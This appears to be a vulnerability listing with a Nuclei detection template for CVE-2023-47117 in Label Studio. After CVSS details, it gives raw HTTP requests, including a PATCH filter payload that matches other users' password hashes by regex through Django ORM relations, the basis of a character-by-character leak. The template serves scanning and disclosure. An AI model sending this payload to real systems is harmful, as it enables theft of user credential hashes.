CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
AI Score
Confidence
Low
EPSS
Percentile
95.4%
An attacker can construct a filter chain to filter tasks based on sensitive fields for all user accounts on the platform by exploiting Django's Object Relational Mapper (ORM). Since the results of query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character.
id: CVE-2023-47117
info:
name: Label Studio - Sensitive Information Exposure
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
An attacker can construct a filter chain to filter tasks based on sensitive fields for all user accounts on the platform by exploiting Django's Object Relational Mapper (ORM). Since the results of query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character.
reference:
- https://security.snyk.io/vuln/SNYK-PYTHON-LABELSTUDIO-6056277
- https://nvd.nist.gov/vuln/detail/CVE-2023-47117
- https://github.com/elttam/publications
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-47117
cwe-id: CWE-200
epss-score: 0.0009
epss-percentile: 0.38398
cpe: cpe:2.3:a:humansignal:label_studio:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
vendor: humansignal
product: label_studio
shodan-query: http.favicon.hash:-1649949475
tags: cve,cve2023,label_studio,oss,exposure,authenticated
variables:
Task_id: "{{task}}"
Project_id: "{{project}}"
http:
- raw:
- |
GET /user/login/ HTTP/1.1
Host: {{Hostname}}
- |
POST /user/login/?next=/projects/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrfmiddlewaretoken={{csrf}}&email={{username}}&password={{password}}&persist_session=on
- |
PATCH /api/dm/views/{{Task_id}}?interaction=filter&project={{Project_id}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"id":{{Task_id}},"data":{"title":"Tasks","ordering":[],"type":"list","target":"tasks","filters":{"conjunction":"or","items":[{"filter":"filter:tasks:updated_by__active_organization__active_users__password","operator":"regex","value":"^pbkdf2_sha256\\$260000\\$","type":"String"}]},"hiddenColumns":{"explore":[],"labeling":[]},"columnsWidth":{},"columnsDisplayType":{},"gridWidth":4,"search_text":null},"project":"{{Project_id}}"}
- |
GET /api/tasks?page=1&page_size=30&view={{Task_id}}&interaction=filter&project={{Project_id}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body_4, "completed_at", "file_upload", "annotators")'
- 'status_code_3==200 && status_code_4==200'
- 'contains(header_4, "application/json")'
condition: and
extractors:
- type: regex
part: body
name: csrf
group: 1
regex:
- 'me="csrfmiddlewaretoken" value="([a-zA-Z0-9]+)">'
internal: true
# digest: 4a0a00473045022100efb2bff232c70a7681dabfdbe49a60c516fcd5f5e446af96976aa8295a59d6b20220612431a6a43f670e2023f79605bdb673f619d459e4d74126b8bfc430ff91f9af:922c64590222798bb761d5b6d8e72950
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
AI Score
Confidence
Low
EPSS
Percentile
95.4%